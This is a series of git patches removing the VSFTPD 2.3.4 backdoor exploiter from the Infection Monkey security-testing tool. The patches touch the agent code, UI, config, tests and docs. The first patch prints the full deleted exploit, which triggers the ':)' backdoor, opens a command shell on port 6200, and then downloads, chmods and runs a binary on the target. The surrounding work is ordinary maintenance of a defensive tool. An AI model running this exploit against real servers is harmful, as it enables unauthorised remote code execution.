From 40b9b5b730b4db5d67af9a2f854c90a374e33ed1 Mon Sep 17 00:00:00 2001
From: Shreya Malviya
Date: Fri, 29 Oct 2021 17:57:12 +0530
Subject: [PATCH 1/8] Agent: Remove VSFTPD exploiter
---
 monkey/infection_monkey/example.conf | 1 -
 monkey/infection_monkey/exploit/vsftpd.py | 166 ----------------------
 2 files changed, 167 deletions(-)
 delete mode 100644 monkey/infection_monkey/exploit/vsftpd.py
diff --git a/monkey/infection_monkey/example.conf b/monkey/infection_monkey/example.conf
index e5ce947c9..d9acee9ed 100644
--- a/monkey/infection_monkey/example.conf
+++ b/monkey/infection_monkey/example.conf
@@ -39,7 +39,6 @@
 "Struts2Exploiter",
 "WebLogicExploiter",
 "HadoopExploiter",
- "VSFTPDExploiter",
 "MSSQLExploiter"
 ],
 "finger_classes": [
diff --git a/monkey/infection_monkey/exploit/vsftpd.py b/monkey/infection_monkey/exploit/vsftpd.py
deleted file mode 100644
index 42c7c052f..000000000
--- a/monkey/infection_monkey/exploit/vsftpd.py
+++ /dev/null
@@ -1,166 +0,0 @@ -""" - Implementation is based on VSFTPD v2.3.4 Backdoor Command Execution exploit by metasploit - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp - /vsftpd_234_backdoor.rb - only vulnerable version is "2.3.4" -""" - -import socket -import time -from logging import getLogger - -from common.utils.attack_utils import ScanStatus -from infection_monkey.exploit.HostExploiter import HostExploiter -from infection_monkey.exploit.tools.helpers import get_monkey_depth, get_target_monkey -from infection_monkey.exploit.tools.http_tools import HTTPTools -from infection_monkey.model import ( - CHMOD_MONKEY, - DOWNLOAD_TIMEOUT, - MONKEY_ARG, - RUN_MONKEY, - WGET_HTTP_UPLOAD, -) -from infection_monkey.telemetry.attack.t1222_telem import T1222Telem -from infection_monkey.utils.commands import build_monkey_commandline - -logger = getLogger(__name__) - - -FTP_PORT = 21 # port at which vsftpd runs -BACKDOOR_PORT = 6200 # backdoor port -RECV_128 = 128 # In Bytes -UNAME_M = "uname -m" -ULIMIT_V = "ulimit -v " # To increase the memory limit -UNLIMITED = "unlimited;" -USERNAME = b"USER D3fa1t:)" # Ftp Username should end with :) to trigger the backdoor -PASSWORD = b"PASS please" # Ftp Password -FTP_TIME_BUFFER = 1 # In seconds - - -class VSFTPDExploiter(HostExploiter): - _TARGET_OS_TYPE = ["linux"] - _EXPLOITED_SERVICE = "VSFTPD" - - def __init__(self, host): - self._update_timestamp = 0 - super(VSFTPDExploiter, self).__init__(host) - self.skip_exist = self._config.skip_exploit_if_file_exist - - def socket_connect(self, s, ip_addr, port): - try: - s.connect((ip_addr, port)) - return True - except socket.error as e: - logger.info("Failed to connect to %s: %s", self.host.ip_addr, str(e)) - return False - - def socket_send_recv(self, s, message): - try: - s.send(message) - return s.recv(RECV_128).decode("utf-8") - except socket.error as e: - logger.info("Failed to send payload to %s: %s", self.host.ip_addr, str(e)) - return False - - def 
socket_send(self, s, message): - try: - s.send(message) - return True - except socket.error as e: - logger.info("Failed to send payload to %s: %s", self.host.ip_addr, str(e)) - return False - - def _exploit_host(self): - logger.info("Attempting to trigger the Backdoor..") - ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - - if self.socket_connect(ftp_socket, self.host.ip_addr, FTP_PORT): - ftp_socket.recv(RECV_128).decode("utf-8") - - if self.socket_send_recv(ftp_socket, USERNAME + b"\n"): - time.sleep(FTP_TIME_BUFFER) - self.socket_send(ftp_socket, PASSWORD + b"\n") - ftp_socket.close() - logger.info("Backdoor Enabled, Now we can run commands") - else: - logger.error("Failed to trigger backdoor on %s", self.host.ip_addr) - return False - - logger.info("Attempting to connect to backdoor...") - backdoor_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - - if self.socket_connect(backdoor_socket, self.host.ip_addr, BACKDOOR_PORT): - logger.info("Connected to backdoor on %s:6200", self.host.ip_addr) - - uname_m = str.encode(UNAME_M + "\n") - response = self.socket_send_recv(backdoor_socket, uname_m) - - if response: - logger.info("Response for uname -m: %s", response) - if "" != response.lower().strip(): - # command execution is successful - self.host.os["machine"] = response.lower().strip() - self.host.os["type"] = "linux" - else: - logger.info("Failed to execute command uname -m on victim %r ", self.host) - - src_path = get_target_monkey(self.host) - logger.info("src for suitable monkey executable for host %r is %s", self.host, src_path) - - if not src_path: - logger.info("Can't find suitable monkey executable for host %r", self.host) - return False - - # Create a http server to host the monkey - http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path) - dropper_target_path_linux = self._config.dropper_target_path_linux - logger.info("Download link for monkey is %s", http_path) - - # Upload the monkey to the machine - 
monkey_path = dropper_target_path_linux - download_command = WGET_HTTP_UPLOAD % {"monkey_path": monkey_path, "http_path": http_path} - download_command = str.encode(str(download_command) + "\n") - logger.info("Download command is %s", download_command) - if self.socket_send(backdoor_socket, download_command): - logger.info("Monkey is now Downloaded ") - else: - logger.error("Failed to download monkey at %s", self.host.ip_addr) - return False - - http_thread.join(DOWNLOAD_TIMEOUT) - http_thread.stop() - - # Change permissions - change_permission = CHMOD_MONKEY % {"monkey_path": monkey_path} - change_permission = str.encode(str(change_permission) + "\n") - logger.info("change_permission command is %s", change_permission) - backdoor_socket.send(change_permission) - T1222Telem(ScanStatus.USED, change_permission.decode(), self.host).send() - - # Run monkey on the machine - parameters = build_monkey_commandline( - self.host, get_monkey_depth() - 1, vulnerable_port=FTP_PORT - ) - run_monkey = RUN_MONKEY % { - "monkey_path": monkey_path, - "monkey_type": MONKEY_ARG, - "parameters": parameters, - } - - # Set unlimited to memory - # we don't have to revert the ulimit because it just applies to the shell obtained by our - # exploit - run_monkey = ULIMIT_V + UNLIMITED + " " + run_monkey - run_monkey = str.encode(str(run_monkey) + "\n") - time.sleep(FTP_TIME_BUFFER) - if backdoor_socket.send(run_monkey): - logger.info( - "Executed monkey '%s' on remote victim %r (cmdline=%r)", - self._config.dropper_target_path_linux, - self.host, - run_monkey, - ) - self.add_executed_cmd(run_monkey.decode()) - return True - else: - return False From 97c50c3caa8b36f0b93bd1fbdf8a219fdb7ad519 Mon Sep 17 00:00:00 2001 
From: Shreya Malviya
Date: Fri, 29 Oct 2021 18:12:06 +0530
Subject: [PATCH 2/8] UI: Remove components related to the VSFTPD exploiter
---
 .../report-components/SecurityReport.js | 6 ----
 .../security/issues/VsftpdIssue.js | 36 -------------------
 2 files changed, 42 deletions(-)
 delete mode 100644 monkey/monkey_island/cc/ui/src/components/report-components/security/issues/VsftpdIssue.js
diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js b/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js
index 3dcf94615..c8b46c2bf 100644
--- a/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js
+++ b/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js
@@ -25,7 +25,6 @@ import {webLogicIssueOverview, webLogicIssueReport} from './security/issues/WebL
 import {hadoopIssueOverview, hadoopIssueReport} from './security/issues/HadoopIssue';
 import {mssqlIssueOverview, mssqlIssueReport} from './security/issues/MssqlIssue';
 import {drupalIssueOverview, drupalIssueReport} from './security/issues/DrupalIssue';
-import {vsftpdIssueOverview, vsftpdIssueReport} from './security/issues/VsftpdIssue';
 import {wmiPasswordIssueReport, wmiPthIssueReport} from './security/issues/WmiIssue';
 import {sshKeysReport, shhIssueReport, sshIssueOverview} from './security/issues/SshIssue';
 import {sambacryIssueOverview, sambacryIssueReport} from './security/issues/SambacryIssue';
@@ -108,11 +107,6 @@ class ReportPageComponent extends AuthComponent {
 [this.issueContentTypes.REPORT]: drupalIssueReport,
 [this.issueContentTypes.TYPE]: this.issueTypes.DANGER
 },
- 'VSFTPDExploiter': {
- [this.issueContentTypes.OVERVIEW]: vsftpdIssueOverview,
- [this.issueContentTypes.REPORT]: vsftpdIssueReport,
- [this.issueContentTypes.TYPE]: this.issueTypes.DANGER
- },
 'WmiExploiter': {
 [this.issueContentTypes.REPORT]: {
 [this.credentialTypes.PASSWORD]: wmiPasswordIssueReport,
diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/VsftpdIssue.js b/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/VsftpdIssue.js deleted file mode 100644 index e5419a9c2..000000000 --- a/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/VsftpdIssue.js +++ /dev/null @@ -1,36 +0,0 @@ -import React from 'react'; -import CollapsibleWellComponent from '../CollapsibleWell'; - -export function vsftpdIssueOverview() { - return (
  • VSFTPD is vulnerable to CVE-2011-2523. -
  • ) -} - -export function vsftpdIssueReport(issue) { - return ( - <> - Update your VSFTPD server to the latest version vsftpd-3.0.3. - - The machine {issue.machine} ({issue.ip_address}) has a backdoor running at - port 6200. -
    - The attack was made possible because the VSFTPD server was not patched against CVE-2011-2523. -

    In July 2011, it was discovered that vsftpd version 2.3.4 downloadable from the master site had been - compromised. - Users logging into a compromised vsftpd-2.3.4 server may issue a ":)" smileyface as the username and gain a - command - shell on port 6200. -

    - The Monkey executed commands by first logging in with ":)" in the username and then sending commands to the - backdoor - at port 6200. -

    Read more about the security issue and remediation here. -
    - - ); -}
From 3f19c0bb3c13459ac41332a926f3fd73cf54ed24 Mon Sep 17 00:00:00 2001
From: Shreya Malviya
Date: Fri, 29 Oct 2021 18:12:40 +0530
Subject: [PATCH 3/8] Island: Remove config and reporting stuff related to the VSFTPD exploiter
---
 monkey/monkey_island/cc/services/config_schema/basic.py | 1 -
 .../config_schema/definitions/exploiter_classes.py | 9 ---------
 .../exploit_processing/exploiter_descriptor_enum.py | 3 ---
 3 files changed, 13 deletions(-)
diff --git a/monkey/monkey_island/cc/services/config_schema/basic.py b/monkey/monkey_island/cc/services/config_schema/basic.py
index 6608cac2c..b822c98ea 100644
--- a/monkey/monkey_island/cc/services/config_schema/basic.py
+++ b/monkey/monkey_island/cc/services/config_schema/basic.py
@@ -23,7 +23,6 @@ BASIC = {
 "Struts2Exploiter",
 "WebLogicExploiter",
 "HadoopExploiter",
- "VSFTPDExploiter",
 "MSSQLExploiter",
 "DrupalExploiter",
 "PowerShellExploiter",
diff --git a/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py b/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py
index 85cc09014..348deb255 100644
--- a/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py
+++ b/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py
@@ -120,15 +120,6 @@ EXPLOITER_CLASSES = {
 "https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn.",
 "link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/hadoop/",
 },
- {
- "type": "string",
- "enum": ["VSFTPDExploiter"],
- "title": "VSFTPD Exploiter",
- "safe": True,
- "info": "Exploits a malicious backdoor that was added to the VSFTPD download archive. "
- "Logic based on Metasploit module.",
- "link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/vsftpd/",
- },
 {
 "type": "string",
 "enum": ["DrupalExploiter"],
diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py
index 15e1bfef4..932243c33 100644
--- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py
+++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py
@@ -42,9 +42,6 @@ class ExploiterDescriptorEnum(Enum):
 )
 HADOOP = ExploiterDescriptor("HadoopExploiter", "Hadoop/Yarn Exploiter", ExploitProcessor)
 MSSQL = ExploiterDescriptor("MSSQLExploiter", "MSSQL Exploiter", ExploitProcessor)
- VSFTPD = ExploiterDescriptor(
- "VSFTPDExploiter", "VSFTPD Backdoor Exploiter", CredExploitProcessor
- )
 DRUPAL = ExploiterDescriptor("DrupalExploiter", "Drupal Server Exploiter", ExploitProcessor)
 ZEROLOGON = ExploiterDescriptor(
 "ZerologonExploiter", "Zerologon Exploiter", ZerologonExploitProcessor
From ee79ea0a9def55d3e2d85e1913a887d91f6ea65b Mon Sep 17 00:00:00 2001
From: Shreya Malviya
Date: Fri, 29 Oct 2021 18:15:38 +0530
Subject: [PATCH 4/8] Project: Remove variable 'VSFTPD' from Vulture's allowlist
---
 vulture_allowlist.py | 1 -
 1 file changed, 1 deletion(-)
diff --git a/vulture_allowlist.py b/vulture_allowlist.py
index bab90e90d..68e28d4be 100644
--- a/vulture_allowlist.py
+++ b/vulture_allowlist.py
@@ -63,7 +63,6 @@ STRUTS2 # unused variable (monkey/monkey_island/cc/services/reporting/issue_pro
 WEBLOGIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:40)
 HADOOP # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:43)
 MSSQL # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:44)
-VSFTPD # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:45)
 DRUPAL # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:48)
 POWERSHELL # (\monkey\monkey_island\cc\services\reporting\issue_processing\exploit_processing\exploiter_descriptor_enum.py:52)
 _.do_POST # unused method (monkey/monkey_island/cc/server_utils/bootloader_server.py:26)
From b005946d882d2849f02213fea12ce9847ad1f57c Mon Sep 17 00:00:00 2001
From: Shreya Malviya
Date: Fri, 29 Oct 2021 18:17:33 +0530
Subject: [PATCH 5/8] BB: Remove VSFTPD exploiter from BB performance test's config template
---
 envs/monkey_zoo/blackbox/config_templates/performance.py | 1 -
 1 file changed, 1 deletion(-)
diff --git a/envs/monkey_zoo/blackbox/config_templates/performance.py b/envs/monkey_zoo/blackbox/config_templates/performance.py
index 2662642e6..ccc073197 100644
--- a/envs/monkey_zoo/blackbox/config_templates/performance.py
+++ b/envs/monkey_zoo/blackbox/config_templates/performance.py
@@ -22,7 +22,6 @@ class Performance(ConfigTemplate):
 "Struts2Exploiter",
 "WebLogicExploiter",
 "HadoopExploiter",
- "VSFTPDExploiter",
 "MSSQLExploiter",
 "PowerShellExploiter",
 "ZerologonExploiter",
From c6cbaca75b49e9f704e438e8a1a5b30cf7c74dd0 Mon Sep 17 00:00:00 2001
From: Shreya Malviya
Date: Fri, 29 Oct 2021 18:19:25 +0530
Subject: [PATCH 6/8] UT: Remove VSFTPD exploiter from unit tests' data - standard monkey config
---
 .../data_for_tests/monkey_configs/monkey_config_standard.json | 1 -
 1 file changed, 1 deletion(-)
diff --git a/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json b/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json
index 70176d94a..c1857c639 100644
--- a/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json
+++ b/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json
@@ -11,7 +11,6 @@
 "Struts2Exploiter",
 "WebLogicExploiter",
 "HadoopExploiter",
- "VSFTPDExploiter",
 "MSSQLExploiter",
 "DrupalExploiter"
 ]
From 455a8f2680573918e378bd3240db24a7357fe6a4 Mon Sep 17 00:00:00 2001
From: Shreya Malviya
Date: Fri, 29 Oct 2021 18:20:12 +0530
Subject: [PATCH 7/8] Docs: Remove VSFTPD exploiter from the docs
---
 docs/content/reference/exploiters/VSFTPD.md | 9 ---------
 1 file changed, 9 deletions(-)
 delete mode 100644 docs/content/reference/exploiters/VSFTPD.md
diff --git a/docs/content/reference/exploiters/VSFTPD.md b/docs/content/reference/exploiters/VSFTPD.md
deleted file mode 100644
index 32b3ad96f..000000000
--- a/docs/content/reference/exploiters/VSFTPD.md
+++ /dev/null
@@ -1,9 +0,0 @@
----
-title: "VSFTPD"
-date: 2020-07-14T08:42:39+03:00
-draft: false
-tags: ["exploit", "linux"]
----
-### Description
-
-This exploits a malicious backdoor that was added to the VSFTPD download archive. The logic is based on [this MetaSploit module](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb).
From 779ae79499ac7acf3d42dd8d2a5a0d0d16ec16a7 Mon Sep 17 00:00:00 2001
From: Shreya Malviya
Date: Fri, 29 Oct 2021 18:24:23 +0530
Subject: [PATCH 8/8] Changelog: Add entry for removing the VSFTPD exploiter
---
 CHANGELOG.md | 1 +
 1 file changed, 1 insertion(+)
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 18a655320..4eb1f0c42 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -11,6 +11,7 @@ Changelog](https://keepachangelog.com/en/1.0.0/).
 ### Changed
 ### Removed
+- The VSFTPD exploiter. #1533
 ### Fixed
 - A bug in network map page that caused delay of telemetry log loading. #1545